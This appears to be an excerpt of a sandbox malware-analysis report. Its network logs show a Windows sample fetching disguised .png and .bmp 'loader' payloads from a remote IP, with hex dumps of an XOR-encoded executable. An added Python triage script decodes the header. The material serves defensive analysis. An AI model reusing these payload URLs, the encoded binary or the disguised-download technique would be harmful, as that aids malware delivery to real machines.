                                                                  Data Ascii: "hvtvincprdSfhutvij#prladSxfhutvijcprladSxfhutvijcprladxfh{kgjyMeG<IsIPD:F,:'V\alnwxfhutvi:&pr `gS9qDtvijcprld]YmistvacptladSxfxviJcprLmdSx&huTvijaprhadSxfhupvijcprla_xfjutvijcsr,dShfhetvijspr|adSxfhetvijcprladSTldu#vijcP~l5gSxfhutvijcprladSxfh5xvejcprladSxfhutvijcprladSxfhutvijcprladSxfhutvijcprladsxf`utvijcprlad[Xfh=tvijcprladSVvijylaDSxf~tvkjcprladSxfhutvIjc\0xfh!wvijC|rledSxcutvijcprladSx&hu4XlahSxfh5xvihcprjdSxfhutvijcpr,adxfhutvijcprladSxbytvijc8rlafS}fL~vabpsladSxfhtiwrladSxfhutvijcprladSxfhutvijcprladSxfhutvjZjpeladSxfhcXsFj[|DcdS~M]lvilHpXlgNSxeXtgijcprlafEnJ`S\hiji[qJJyxfhvD}icprladSzNvut|jGemlan){MptpElPrlkQ{sEXRPkiWwlgBxfibYUOLarZjadUaKvSRtkBdprj`SxbC`wijg[cdS|MwvinHXladPHlhctvijcprnyz~u@ttvmEurjJguSButuY`cirladSxfjio[yLqrlet}fnj~/BiE[FadS{Vbuevijcprlc|FUnNwvinHsTGNSxfkE~vxjcprladQb{E}RmjctYoGORfhuwFcjIprladSxd~`YmOiuf^tG`N`K}Sqxmdf~tDjdS~MaS_OAVYKdSkVcuvijbpr}cRxflSsil]7JcQxflbYHOhqrlegW}a~


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49708 | 162.55.60.2 | 80 | C:\Users\user\Desktop\BPL_1000572_007.bat.exe
Timestamp | kBytes transferred | Direction | Data
Sep 23, 2022 08:01:19.684577942 CEST | 920 | OUT | GET / HTTP/1.1
User-Agent: Project1sqlite
Host: showip.net
Sep 23, 2022 08:01:19.708090067 CEST | 922 | IN | HTTP/1.1 200 OK
                                                                  Access-Control-Allow-Headers: *
                                                                  Access-Control-Allow-Methods: *
                                                                  Access-Control-Allow-Origin: *
                                                                  Content-Type: text/html;charset=utf-8
                                                                  Date: Fri, 23 Sep 2022 06:01:19 GMT
                                                                  Server: Caddy
                                                                  Transfer-Encoding: chunked
                                                                  Data Raw: 32 33 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 68 65 63 6b 20 79 6f 75 72 20 49 50 20 61 64 64 72 65 73 73 20 28 49 50 76 34 20 6f 72 20 49 50 76 36 29 2c 20 67 65 6f 67 72 61 70 68 69 63 61 6c 20 49 50 20 6c 6f 63 61 74 69 6f 6e 20 61 6e 64 20 77 68 69 63 68 20 62 72 6f 77 73 65 72 20 61 6e 64 20 4f 53 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 70 2c 20 61 64 64 72 65 73 73 2c 20 6c 6f 63 61 74 69 6f 6e 2c 20 67 65 6f 20 6c 6f 63 61 74 69 6f 6e 2c 20 69 70 20 6c 6f 63 61 74 69 6f 6e 2c 20 69 70 20 61 64 64 72 65 73 73 2c 20 63 68 65 63 6b 20 69 70 2c 20 73 68 6f 77 20 69 70 2c 20 73 68 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 6c 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 68 6f 77 20 49 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 
3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 68 65 63 6b 20 79 6f 75 72 20 49 50 20 61 64 64 72 65 73 73 20 28 49 50 76 34 20 6f 72 20 49 50 76 36 29 2c 20 67 65 6f 67 72 61 70 68 69 63 61 6c 20 49 50 20 6c 6f 63 61 74 69 6f 6e 20 61 6e 64 20 77 68 69 63 68 20 62 72 6f 77 73 65 72 20 61 6e 64 20 4f 53 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 64 6d 69 6e 73 22 20 63 6f 6e 74 65 6e 74 3d 22 36 37 36 31 31 30 32 36 35 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 59 6f 75 72 20 49 50 20 61 64 64 72 65 73 73 20 28 49 50 76 34 20 6f 72 20 49 50 76 36 29 2c 20 67 65 6f 67 72 61 70 68 69 63 61 6c 20 49 50 20 6c 6f 63 61 74 69 6f 6e 2c 20 62 72 6f 77 73 65 72 20 61 6e 64 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 20 2d 20 53 68 6f 77 20 49 50 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 59 6f 75 72 20 49 50 20 61 64 64 72 65 73 73 20 28 49 50 76 34 20 6f 72 20 49 50 76 36 29 2c 20 67 65 6f 67 72 61 70 68 69 63 61 6c 20 49 50 20 6c 6f 63 61 74 69 6f 6e 2c 20 62 72 6f 77 73 65 72 20 61 6e 64 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 20 2d 20 53 68 6f 77 20 49 50 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61
                                                                  Data Ascii: 2393<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="description" content="Check your IP address (IPv4 or IPv6), geographical IP location and which browser and OS you are using"> <meta name="keywords" content="ip, address, location, geo location, ip location, ip address, check ip, show ip, show"> <meta name="robots" content="All"> <meta property="og:site_name" content="Show IP"> <meta property="og:type" content="website"> <meta property="og:description" content="Check your IP address (IPv4 or IPv6), geographical IP location and which browser and OS you are using"> <meta property="fb:admins" content="676110265"> <meta property="og:title" content="Your IP address (IPv4 or IPv6), geographical IP location, browser and operating system - Show IP"> <title>Your IP address (IPv4 or IPv6), geographical IP location, browser and operating system - Show IP</title> <script type="applica


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49709 | 185.252.178.63 | 80 | C:\Users\user\Desktop\BPL_1000572_007.bat.exe
Timestamp | kBytes transferred | Direction | Data
Sep 23, 2022 08:01:28.979443073 CEST | 931 | OUT | GET /loader/uploads/inf_Hpgwbzkt.bmp HTTP/1.1
Host: 185.252.178.63
Connection: Keep-Alive
Sep 23, 2022 08:01:29.045222998 CEST | 932 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 23 Sep 2022 06:01:28 GMT
                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                                  Last-Modified: Thu, 22 Sep 2022 12:18:33 GMT
                                                                  ETag: "1a391e-5e9430f651a29"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 1718558
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: image/bmp
                                                                  Data Raw: 42 4d 1e 39 1a 00 00 00 00 00 8a 00 00 00 7c 00 00 00 17 02 00 00 23 03 00 00 01 00 20 00 03 00 00 00 94 38 1a 00 13 0b 00 00 13 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 ff 00 00 ff 00 00 ff 00 00 00 42 47 52 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff f3 f9 f8 ff f3 f9 f8 ff f3 f9 f8 ff f3 f9 f8 ff f5 fb fa ff f4 fa f9 ff f3 f9 f8 ff f3 f9 f8 ff f4 fa f9 ff f3 f9 f9 ff f3 f9 f7 ff f2 f8 f7 ff f5 fa f9 ff f4 f9 f7 ff f4 f7 f6 ff f3 f6 f5 ff f0 f8 ef ff ee f6 ec ff ed f2 e9 ff eb f0 e7 ff ec ef e6 ff ed ee e5 ff ec ec e4 ff e9 ea e1 ff ea e8 e0 ff ea e8 e0 ff ea e8 e0 ff ea e8 e0 ff e9 e7 df ff e9 e7 df ff ea e8 e0 ff ea e9 e1 ff e8 e8 e4 ff e7 e9 e5 ff e9 ea e6 ff e9 ea e6 ff ea eb e7 ff ea eb e7 ff ea eb e7 ff ea eb e7 ff eb ec e8 ff ec ed e9 ff ed ee ea ff ed ee ea ff ed ee ea ff ee ef eb ff f0 f1 ed ff f0 f1 ed ff f0 f3 ee ff ee f2 ed ff ef f0 ec ff ed ef e9 ff ee f0 ea ff ef ef e9 ff ed ef e5 ff ec ed e4 ff ee eb e6 ff ee eb e5 ff ed ea e5 ff ec e9 e4 ff ec e9 e3 ff ec e9 e3 ff ec e9 e3 ff ec e9 e3 ff ec e9 e4 ff ed ea e5 ff ed ea e5 ff ed ea e5 ff ec e9 e4 ff eb e8 e3 ff ea e7 e1 ff e8 e5 e0 ff e8 e4 df ff e7 e3 de ff e6 e2 dd ff e6 e2 dd ff e4 e0 db ff e4 e0 db ff e4 e0 db ff e4 e0 db ff e4 de d8 ff e4 de d7 ff e4 de d7 ff e4 de d7 ff e2 dc d5 ff e1 db d4 ff e1 db d4 ff e1 db d4 ff e3 db d4 ff e3 db d4 ff e3 db d4 ff e1 db d4 ff e1 db d4 ff e0 dc d4 ff df dc d4 ff df dc d4 ff df dc d4 ff df dc d4 ff df dc d4 ff df dc d4 ff df dc d4 ff df dc d4 ff e0 dd d5 ff e1 de d6 ff e1 df d7 ff e1 df d7 ff e3 e1 d9 ff e4 e2 da ff e5 e3 db ff e7 e5 dd ff e7 e5 dd ff e8 e6 de ff e7 e8 df ff e7 ea e1 ff e7 ea e1 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb e2 ff e8 eb 
e2 ff e8 eb e2 ff e8 eb e2 ff e8 e9 e3 ff ea e9 e5 ff ea e9 e5 ff ea ea e6 ff eb ec e8 ff ec ed e9 ff f0 ed e9 ff bd b1 af ff 7a 76 77 ff 6a 70 75 ff 60 65 68 ff 57 5c 60 ff 4f 55 59 ff 4c 52 5c ff 61 67 76 ff 65 6c 7e ff 63 6c 7f ff 5c 67 7a ff 5f 67 7b ff 64 6a 7e ff 59 60 70 ff 51 5a 66 ff 59 61 6f ff 61 68 7a ff 5c 64 77 ff 5d 65 78 ff 5a 60 6f ff 45 48 53 ff 43 44 4c ff 4b 4b 51 ff 4d 4d 53 ff 4c 4c 55 ff 4f 4d 57 ff 50 4c 57 ff 50 54 5e ff 51 5a 63 ff 58 60 67 ff 4b 50 54 ff 50 55 5b ff 68 71 7b ff 69 71 7f ff 6e 73 85 ff 6c 70 81 ff 66 69 78 ff 68 6b 7a ff 6d 6f 7f ff 69 6b 7d ff 68 6c 81 ff 6d 72 84 ff 6a 6e 79 ff 50 50 58 ff 36 34 37 ff 37 33 34 ff 34 30 2f ff 3c 39 38 ff 3c 3a 3b ff 35 33 34 ff 4d 48 4b ff 63 65 6f ff 68 71 82 ff 54 5d 6d ff 41 45 4e ff 4f 50 53 ff 40 42 43 ff 2b 2a 2b ff 2f 2a 29 ff 2b 27 29 ff 2f 2e 39 ff 4d 4e 61 ff 5b 5d 72 ff 52 59 66 ff 35 3a 46 ff 29 2f 3a ff 2b 2d 36 ff 37 39 41 ff 31 2e 33 ff 1e 1b 1d ff 1b 1c 1d ff 23 28 2d ff 3c 44 4f ff 49 55 65 ff 3e 4c 5d ff 2e 37 46 ff 29 2d 35 ff 32 34 38 ff 35 34 37 ff 29 2a 2d ff 27 29 2e ff 37 3b 43 ff 48 50 57 ff 4e 57 61 ff 55 5e 6d ff 4f 59 65
                                                                  Data Ascii: BM9|# 8BGRszvwjpu`ehW\`OUYLR\agvel~cl\gz_g{dj~Y`pQZfYaoahz\dw]exZ`oEHSCDLKKQMMSLLUOMWPLWPT^QZcX`gKPTPU[hq{iqnslpfixhkzmoik}hlmrjnyPPX64773440/<98<:;534MHKceohqT]mAENOPS@BC+*+/*)+')/.9MNa[]rRYf5:F)/:+-679A1.3#(-<DOIUe>L].7F)-5248547)*-').7;CHPWNWaU^mOYe
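Added triage example, not part of the Joe Sandbox report and not code from the sample: the two loader downloads above deserve more than the headers give. Session 0 is served as Content-Type: image/png, yet its body opens with 1e 22 f6 68 instead of the PNG signature, and the Data Ascii view shows the 15-character string "Sxfhutvijcprlad" repeating, which is what a repeating-key XOR over long runs of zero bytes looks like. Session 2 is served as image/bmp and does start with "BM", so its file header can be checked against Content-Length. The Python below takes the first 160 bytes of the .png body and the first 38 bytes of the .bmp body, copied from the Data Raw dumps above, and: flags the magic-byte mismatch; treats the repeating pattern as repeating-key XOR, assuming (our assumption, true of PE headers) that 0x00 is the commonest plaintext byte, recovers the period and key, and tests whether the decoded prefix is a DOS/PE header; and parses the BMP headers for internal consistency. Function names, the 64-byte period limit and the zero-run assumption are ours. On these 160 bytes the decoding yields the standard DOS stub and a PE signature at offset 0x80, so the "PNG" is at least an XOR-encoded PE header; the full 783360-byte body would be needed to say what the file is. The bitmap's headers line up (a 535x803, 32-bpp image whose pixel data exactly fills the declared size), which only proves the container is well-formed: a loader that fetches a well-formed image is exactly where pixel data would be used to carry a payload, and these headers cannot show that either way.

```python
"""Triage of the two loader downloads captured above.

Added example, not code from the Joe Sandbox report or from the sample.
PNG_BODY / BMP_HEAD are copied from the report's "Data Raw" dumps and
truncated; the zero-run assumption, limits and names are ours.
"""
from collections import Counter
import struct

# Signatures for the Content-Types the server claimed.
MAGIC = {"image/png": b"\x89PNG\r\n\x1a\n", "image/bmp": b"BM"}

# First 160 bytes of /loader/uploads/Arwiw_Xnqfdlpv.png (session 0).
PNG_BODY = bytes.fromhex(
    "1e22f668767476696e637072939e6453"
    "c06668757476696a2370726c61645378"
    "6668757476696a6370726c6164537866"
    "68757476696a6370726c6164d3786668"
    "7b6bcc676ad779bf4dd9651fb5473c1d"
    "1d05491a111f151e0009731b07061b1b"
    "024908065000190f443a16462c3a2756"
    "040507155c616c6e7778666875747669"
    "3a26707220606753397144167476696a"
    "6370726c81645d596d69737476856163"
)
# First 38 bytes of /loader/uploads/inf_Hpgwbzkt.bmp (session 2).
BMP_HEAD = bytes.fromhex(
    "424d1e391a00000000008a0000007c000000"
    "1702000023030000010020000300000094381a00"
)
BMP_CONTENT_LENGTH = 1718558  # Content-Length header of session 2


def magic_mismatch(content_type: str, body: bytes) -> bool:
    """True when the declared type has a known signature the body lacks."""
    ctype = content_type.split(";")[0].strip().lower()
    magic = MAGIC.get(ctype)
    return magic is not None and not body.startswith(magic)


def find_period(data: bytes, max_period: int = 64) -> int:
    """Period of a repeating-key XOR stream, assuming the plaintext has long
    zero runs: there the ciphertext equals the key, so bytes p apart coincide
    far more often for the true period than for any other shift."""
    best_p, best_hits = 1, -1
    for p in range(1, max_period + 1):
        hits = sum(1 for i in range(len(data) - p) if data[i] == data[i + p])
        if hits > best_hits:  # strict '>' keeps the smallest p among equals
            best_p, best_hits = p, hits
    return best_p


def recover_key(data: bytes, period: int) -> bytes:
    """Most frequent byte in each residue class mod period; correct whenever
    0x00 is the commonest plaintext byte in that class (assumption)."""
    return bytes(Counter(data[j::period]).most_common(1)[0][0] for j in range(period))


def xor_decode(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(blob: bytes):
    """Return (e_lfanew, machine) if blob carries an MZ/PE header, else None."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 6 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine = struct.unpack_from("<H", blob, e_lfanew + 4)[0]
    return e_lfanew, machine


def bmp_header_consistent(body: bytes, content_length: int) -> dict:
    """Check BITMAPFILEHEADER and the start of BITMAPINFOHEADER against
    Content-Length and against each other (little-endian throughout)."""
    sig, file_size, _r1, _r2, off_bits = struct.unpack_from("<2sIHHI", body, 0)
    _hdr, width, height, _planes, bpp, _comp, image_size = struct.unpack_from(
        "<IiiHHII", body, 14)
    pixel_bytes = abs(width) * abs(height) * bpp // 8
    return {
        "size_matches_content_length": sig == b"BM" and file_size == content_length,
        "pixels_fill_file": off_bits + pixel_bytes == file_size and image_size == pixel_bytes,
        "width": width, "height": height, "bpp": bpp,
    }


def triage() -> dict:
    """Run every check over the captured prefixes and return plain data."""
    out = {"png_magic_mismatch": magic_mismatch("image/png", PNG_BODY),
           "bmp_magic_mismatch": magic_mismatch("image/bmp", BMP_HEAD)}
    if out["png_magic_mismatch"]:
        period = find_period(PNG_BODY)
        key = recover_key(PNG_BODY, period)
        plain = xor_decode(PNG_BODY, key)
        out.update(xor_period=period, xor_key=key, pe=looks_like_pe(plain),
                   dos_stub=b"This program cannot be run in DOS mode" in plain)
    out["bmp"] = bmp_header_consistent(BMP_HEAD, BMP_CONTENT_LENGTH)
    return out


if __name__ == "__main__":
    for name, value in triage().items():
        print(f"{name}: {value}")
```

find_period scores every shift by the number of equal byte pairs; multiples of the real period also score well, so the strict comparison that keeps the smallest winning shift matters. On a full body both checks get sharper (more zero runs, more residue samples); on a prefix this short a single wrong mode byte in recover_key would corrupt one of every 15 decoded bytes, which is why the result is tested against the DOS stub and PE signature rather than trusted outright.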


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49710 | 185.252.178.63 | 80 | C:\Users\user\Desktop\BPL_1000572_007.bat.exe
Timestamp | kBytes transferred | Direction | Data
Sep 23, 2022 08:01:29.985260010 CEST | 2714 | OUT | GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1
Host: 185.252.178.63
Connection: Keep-Alive
Sep 23, 2022 08:01:30.032283068 CEST | 2715 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 23 Sep 2022 06:01:29 GMT
                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                                  Last-Modified: Thu, 22 Sep 2022 08:05:33 GMT
                                                                  ETag: "bf400-5e93f8695c45a"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 783360
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: image/png
                                                                  Data Raw: 1e 22 f6 68 76 74 76 69 6e 63 70 72 93 9e 64 53 c0 66 68 75 74 76 69 6a 23 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 d3 78 66 68 7b 6b cc 67 6a d7 79 bf 4d d9 65 1f b5 47 3c 1d 1d 05 49 1a 11 1f 15 1e 00 09 73 1b 07 06 1b 1b 02 49 08 06 50 00 19 0f 44 3a 16 46 2c 3a 27 56 04 05 07 15 5c 61 6c 6e 77 78 66 68 75 74 76 69 3a 26 70 72 20 60 67 53 39 71 44 16 74 76 69 6a 63 70 72 6c 81 64 5d 59 6d 69 73 74 76 85 61 63 70 74 6c 61 64 53 78 66 ee 7f 78 76 69 4a 63 70 72 4c 6d 64 53 78 26 68 75 54 76 69 6a 61 70 72 68 61 64 53 78 66 68 75 70 76 69 6a 63 70 72 6c 61 04 5f 78 66 6a 75 74 76 69 6a 63 73 72 2c e4 64 53 68 66 68 65 74 76 69 6a 73 70 72 7c 61 64 53 78 66 68 65 74 76 69 6a 63 70 72 6c 61 64 53 54 6c 64 75 23 76 69 6a 63 50 7e 6c 35 67 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 35 78 76 65 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 73 78 66 60 75 74 76 69 6a 63 70 72 6c 61 64 5b 58 66 68 3d 74 76 69 6a 63 70 72 6c 61 64 53 56 12 0d 0d 00 76 69 6a ef 9a 79 6c 61 44 53 78 66 84 7e 74 76 6b 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 49 6a 63 10 5c 1e 12 16 30 78 66 68 21 77 76 69 6a 43 7c 72 6c 65 64 53 78 88 63 75 74 76 69 6a 63 70 72 6c 61 64 53 78 26 68 75 34 58 1b 0f 0f 1f 11 6c 61 68 53 78 66 68 35 78 76 69 68 63 70 72 9e 6a 64 53 78 66 68 75 74 76 69 6a 63 70 72 2c 61 64 11 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 0e 62 79 74 76 69 6a 63 38 72 6c 61 66 53 7d 66 4c 14 7e 76 61 c3 62 70 73 6c 61 64 53 78 66 68 fd 03 74 69 f6 8a 77 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 69 6a 63 70 72 6c 61 64 53 78 66 68 75 74 76 6a 5a 6a 70 65 6c 61 64 53 78 66 68 63 58 73 7f 46 6a 5b 7c 44 63 64 53 7e 4d 9c 5d 6c 76 69 6c 48 70 58 6c 67 4e 53 78 65 58 7f 74 67 69 6a 63 70 
72 6c 61 66 45 6e 4a 60 53 5c 68 69 6a 69 5b 71 4a 4a 92 79 78 66 68 76 44 7d 69 0f 63 70 72 6c 61 64 53 7a 4e 76 75 74 7c 6a 47 65 03 6d 6c 61 6e 29 7b 09 4d 70 74 70 45 6c 10 50 72 6c 6b 1e 51 7b 73 45 58 52 50 6b 69 0c 57 77 6c 67 e9 42 78 66 69 62 59 55 4f 4c 61 72 5a 6a 61 64 55 61 4b 76 53 52 74 6b 42 64 70 72 6a 1c 60 53 78 62 43 60 09 77 69 6a 67 5b bc 11 63 64 53 7c 4d b0 08 77 76 69 6e 48 ad 58 6c 61 64 50 48 6c 68 63 74 76 69 6a 63 70 72 6e 79 7a 7e 75 40 13 74 74 76 6d 05 45 75 72 6a 4a 67 75 53 97 42 75 74 75 59 60 63 69 72 6c 61 64 53 78 66 6a 69 6f 5b 79 4c 18 71 72 6c 65 0b 74 7d 66 6e 6a 7e 2f 42 69 45 5b 9c 46 61 64 53 7b 56 62 75 65 76 69 6a 63 70 72 6c 63 7c 46 55 6e 4e 0e 77 76 69 6e 48 73 54 47 97 4e 53 78 66 6b 45 7e 76 78 6a 63 70 72 6c 61 64 51 62 7b 45 7d 52 0d 6d 6a 63 74 59 6f 47 4f a5 52 66 68 75 77 46 63 6a 49 70 72 6c 61 64 53 78 64 7e 60 59 6d 4f 69 75 66 5e 74 47 60 4e 60 4b 7d 53 71 78 6d 64 66 7e 74 44 6a 64 53 7e 4d 61 53 5f 95 4f 41 85 56 59 85 4b 64 53 6b 56 63 75 0b 76 69 6a 62 70 72 7d 63 1f 52 78 66 6c 1a 53 73 69 6c 7f 5d 37 4a 63 1f 51 78 66 6c 62 59 48 4f 68 18 71 72 6c 65 67 57 7d 61 7e
                                                                  Data Ascii: "hvtvincprdSfhutvij#prladSxfhutvijcprladSxfhutvijcprladxfh{kgjyMeG<IsIPD:F,:'V\alnwxfhutvi:&pr `gS9qDtvijcprld]YmistvacptladSxfxviJcprLmdSx&huTvijaprhadSxfhupvijcprla_xfjutvijcsr,dShfhetvijspr|adSxfhetvijcprladSTldu#vijcP~l5gSxfhutvijcprladSxfh5xvejcprladSxfhutvijcprladSxfhutvijcprladSxfhutvijcprladsxf`utvijcprlad[Xfh=tvijcprladSVvijylaDSxf~tvkjcprladSxfhutvIjc\0xfh!wvijC|rledSxcutvijcprladSx&hu4XlahSxfh5xvihcprjdSxfhutvijcpr,adxfhutvijcprladSxbytvijc8rlafS}fL~vabpsladSxfhtiwrladSxfhutvijcprladSxfhutvijcprladSxfhutvjZjpeladSxfhcXsFj[|DcdS~M]lvilHpXlgNSxeXtgijcprlafEnJ`S\hiji[qJJyxfhvD}icprladSzNvut|jGemlan){MptpElPrlkQ{sEXRPkiWwlgBxfibYUOLarZjadUaKvSRtkBdprj`SxbC`wijg[cdS|MwvinHXladPHlhctvijcprnyz~u@ttvmEurjJguSButuY`cirladSxfjio[yLqrlet}fnj~/BiE[FadS{Vbuevijcprlc|FUnNwvinHsTGNSxfkE~vxjcprladQb{E}RmjctYoGORfhuwFcjIprladSxd~`YmOiuf^tG`N`K}Sqxmdf~tDjdS~MaS_OAVYKdSkVcuvijbpr}cRxflSsil]7JcQxflbYHOhqrlegW}a~


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.6 | 49711 | 185.252.178.63 | 80 | C:\Users\user\Desktop\BPL_1000572_007.bat.exe
Timestamp | kBytes transferred | Direction | Data
Sep 23, 2022 08:01:37.884829998 CEST | 3522 | OUT | GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1
Host: 185.252.178.63
Connection: Keep-Alive
Sep 23, 2022 08:01:37.922528028 CEST | 3524 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 23 Sep 2022 06:01:37 GMT
                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                                  Last-Modified: Thu, 22 Sep 2022 08:05:33 GMT
                                                                  ETag: "bf400-5e93f8695c45a"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 783360
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: image/png


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  5 | 192.168.2.6 | 49712 | 185.252.178.63 | 80 | C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  Sep 23, 2022 08:01:54.005892038 CEST | 4336 | OUT | GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1
                                                                  Host: 185.252.178.63
                                                                  Connection: Keep-Alive
                                                                  Sep 23, 2022 08:01:54.042484999 CEST | 4337 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 23 Sep 2022 06:01:54 GMT
                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                                  Last-Modified: Thu, 22 Sep 2022 08:05:33 GMT
                                                                  ETag: "bf400-5e93f8695c45a"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 783360
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: image/png


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  6 | 192.168.2.6 | 49715 | 185.252.178.63 | 80 | C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  Sep 23, 2022 08:02:01.550542116 CEST | 5183 | OUT | GET /loader/uploads/Arwiw_Xnqfdlpv.png HTTP/1.1
                                                                  Host: 185.252.178.63
                                                                  Connection: Keep-Alive
                                                                  Sep 23, 2022 08:02:01.587701082 CEST | 5184 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 23 Sep 2022 06:02:01 GMT
                                                                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                                  Last-Modified: Thu, 22 Sep 2022 08:05:33 GMT
                                                                  ETag: "bf400-5e93f8695c45a"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 783360
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: image/png



                                                                  Target ID:0
                                                                  Start time:07:59:49
                                                                  Start date:23/09/2022
                                                                  Path:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\BPL_1000572_007.bat.exe"
                                                                  Imagebase:0x5b0000
